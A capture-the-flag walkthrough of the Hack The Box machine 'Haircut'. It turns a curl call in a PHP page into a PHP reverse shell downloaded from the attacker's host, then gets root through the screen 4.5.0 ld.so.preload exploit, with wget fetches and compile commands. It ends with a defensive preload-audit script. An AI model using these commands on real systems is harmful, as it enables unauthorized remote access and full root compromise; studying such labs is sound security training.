Haircut HTB
IP
10.10.10.24
initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.24 | cut -d"/" -f1 | tr '\n' ','
we have the following ports open
22,80
Let's run a more in-depth scan
sudo nmap -sCV -p22,80 -oA nmap_results 10.10.10.24
results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
| 256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_ 256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open http nginx 1.10.0 (Ubuntu)
|_http-title: HTB Hairdresser
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
we can see
SSH operating
HTTP nginx 1.10.0
Let's check out the web server

Let's run feroxbuster
feroxbuster -u http://10.10.10.24 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt
we do find a couple of interesting directories
301 GET 7l 13w 194c http://10.10.10.24/uploads => http://10.10.10.24/uploads/
200 GET 286l 1220w 226984c http://10.10.10.24/bounce.jpg
200 GET 7l 15w 144c http://10.10.10.24/
200 GET 19l 41w 446c http://10.10.10.24/exposed.php
/exposed.php

when we hit the go button it looks like

Let's catch a request with Burp and see if we can find anything interesting

The web app could very well be calling curl, meaning we may be able to alter the request and have the target download a PHP shell.
Let's use the pentestmonkey PHP reverse shell and change the IP in the script to our own.
Let's start an nc listener
nc -lvnp 1234
Let's start a Python HTTP server
python3 -m http.server 80
In Repeater, let's see if we can get the curl command to download our shell.php
Since we know there is an /uploads directory, this seems like the perfect place to put our shell. Now if we navigate to
/uploads/shell.php
this will establish the callback to our listener and we have a shell on the system

Let's upgrade our shell
python3 -c "import pty;pty.spawn('/bin/bash')"
Within /var/www/html we can see the exposed.php code

and we can indeed see the PHP calling curl, along with a blacklist of characters
Let's check the kernel version
uname -r
results
4.4.0-78-generic
nothing interesting
Let's see if we can find any files with the SUID bit set
find / -type f -perm /4000 2>/dev/null

This seems like an interesting file to have SUID set. After some googling we found an exploit which creates an /etc/ld.so.preload file pointing to a library that creates a setuid shell, then calls screen again to trigger it.
https://github.com/XiphosResearch/exploits/blob/master/screen2root/README.md
We can upload the exploit to our target machine.
Now, once I ran the exploit on the target we were given a strange error, so what I'll do is break the exploit into 3 parts

Let's compile them; we are just following the original script
gcc -fPIC -shared -ldl -o exploit.so exploit.c
gcc -o rootshell root.c
Now let's transfer these files across
python3 -m http.server 80
from the target machine, within the /tmp directory
wget http://10.10.14.2:80/libhax.so
wget http://10.10.14.2:80/rootshell
wget http://10.10.14.2:80/root.sh
Once we have all the files compiled and on the target we can execute them. We'll change directory into /etc, set the umask, and run screen
cd /etc
umask 000
screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
By this point, ld.so.preload should have a reference to /tmp/libhax.so
cat ld.so.preload

Now we can access root by running the screen -ls command

Now ld.so.preload has been cleaned up

If we check the permissions of rootshell, it's now owned by root and the SUID bit is set

Now we just need to execute the rootshell binary and we have root
/tmp/rootshell
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
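From the defender's side, the artefact this technique leaves behind is an /etc/ld.so.preload entry pointing into a user-writable directory, plus a preload file that is not root-owned or is writable by others after the umask 000 trick. The following audit script is an added example, not part of this writeup or of the exploit repository; the trusted and scratch directory lists are assumptions, and the sample file content is constructed to match what the screen log trick writes.

```python
"""Audit ld.so.preload content for loader-hijack indicators (added example)."""
import os
import sys

# Assumed: where legitimate preload libraries live, and user-writable places they never should.
TRUSTED_PREFIXES = ("/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/")
SCRATCH_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


def parse_ld_preload(text):
    """Return the library paths in ld.so.preload content: one or more paths
    per line, separated by whitespace or ':', with '#' starting a comment.
    The leading blank line left by the echo -ne trick above is skipped."""
    entries = []
    for line in text.splitlines():
        entries.extend(line.split("#", 1)[0].replace(":", " ").split())
    return entries


def classify(path):
    """Label one entry: 'ok', 'scratch-dir' or 'untrusted-dir'."""
    if path.startswith(SCRATCH_PREFIXES):
        return "scratch-dir"
    if path.startswith(TRUSTED_PREFIXES):
        return "ok"
    return "untrusted-dir"


def audit_preload(text):
    """Return [(path, verdict)] for every entry that is not 'ok'."""
    return [(p, classify(p)) for p in parse_ld_preload(text) if classify(p) != "ok"]


def loosely_owned(path):
    """True if the file is not root-owned or is group/world-writable, which
    is what 'umask 000' plus a setuid writer leaves behind."""
    st = os.stat(path)
    return st.st_uid != 0 or bool(st.st_mode & 0o022)


# Constructed sample: what the screen log trick writes (newline, then the path).
SAMPLE = "\n/tmp/libhax.so\n"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "/etc/ld.so.preload"
    if not os.path.exists(target):
        print(f"{target} absent; auditing the constructed sample instead")
        content = SAMPLE
    else:
        content = open(target).read()
        if loosely_owned(target):
            print(f"{target}: not root-owned or writable by others")
    for p, verdict in audit_preload(content):
        print(f"SUSPICIOUS preload entry {p}: {verdict}")
```

Run with no argument it checks /etc/ld.so.preload on the host, so it fits in a cron or EDR script; an entry under /tmp such as the one this box ends up with is reported as scratch-dir.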